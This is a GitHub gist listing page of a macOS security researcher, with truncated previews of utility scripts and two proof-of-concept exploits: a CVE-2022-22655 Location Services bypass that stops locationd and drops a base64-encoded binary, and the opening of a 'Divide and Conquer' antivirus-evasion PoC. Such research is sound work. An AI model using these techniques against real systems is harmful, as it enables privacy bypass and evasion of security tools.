Csaba Fitzl theevilbit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| #ugly script bu works. Most of the time. You might need to rerun to get all pages. | |
| #need to open the pages before we can do --print-to-pdf or --dump-dom as otherwise it doesn't load them | |
| #doing PDFs as raw htmls look really ugly | |
| /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --incognito https://developer.apple.com/documentation/technotes/ | |
| sleep 10 | |
| /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --headless=new --incognito --dump-dom https://developer.apple.com/documentation/technotes/ > technotes.html | |
| cat technotes.html | grep -Eo "href=\"/documentation/technotes/tn[a-zA-Z0-9/-]*\"" | cut -d "\"" -f 2 | cut -d "/" -f 4 | sort -u > urls.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : <<-EOL | |
| MIT License | |
| Copyright (c) 2020 Joel Bruner (original: https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/) | |
| Copyright (c) 2023 Csaba Fitzl (updated for Python3 & Monterey+) | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal | |
| in the Software without restriction, including without limitation the rights |
theevilbit
/ macos_sonoma_launch_constraints.txt
Last active
April 13, 2024 20:25
macOS Sonoma (14) Launch Constraints
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original by LinuS Henze for iOS16: https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056 | |
| Following his format I updated it for macOS Sonoma (14) and I guess it's the same for iOS17, but didn't cross check. | |
| Constraint Categories: | |
| Category 0: | |
| Self Constraint: N/A | |
| Parent Constraint: N/A | |
| Category 1: |
theevilbit
/ cve_2022_22655_mount_locationd.sh
Last active
December 22, 2023 23:24
CVE-2022-22655 - macOS Location Services Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| echo "++ Stopping locationd" | |
| sudo launchctl stop com.apple.locationd | |
| echo "++ Dropping swiftliverpool" | |
| echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |
theevilbit
/ all_apple_oss_archives_20220208.txt
Created
February 9, 2022 08:06
Apple OSS Tarball links as of 2022.02.08.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-178 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176.100.1 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-174.0.1 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-172 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-168 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-163 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-158 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-153 | |
| https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-149 |
theevilbit
/ get_apple_oss.sh
Last active
April 25, 2022 04:32
Download All Apple OSS Tarballs from Github
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| : ' | |
| You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs: | |
| https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api | |
| https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token | |
| ' | |
| APPLE_OSS_DIR="all_apple_oss_archives" | |
| APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt" |
theevilbit
/ screenshot.m
Last active
April 19, 2024 07:55
Make a screenshot on macOS using Objective-C
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Compile: | |
| gcc -framework Foundation -framework AppKit screenshot.m -o screenshot | |
| */ | |
| #import <Foundation/Foundation.h> | |
| #import <AppKit/AppKit.h> | |
| int main(void) { |
This file has been truncated, but you can view the full file.
theevilbit
/ divide_and_conquer.c
Created
January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
| */ | |
| #include <stdio.h> | |
| #include <tchar.h> | |
| #include <windows.h> | |
| #include "Commctrl.h" | |
| #include <string> |
theevilbit
/ download_apple_tarballs.sh
Last active
July 2, 2021 02:38
Download tarballs from https://opensource.apple.com/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/ | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/ |
NewerOlder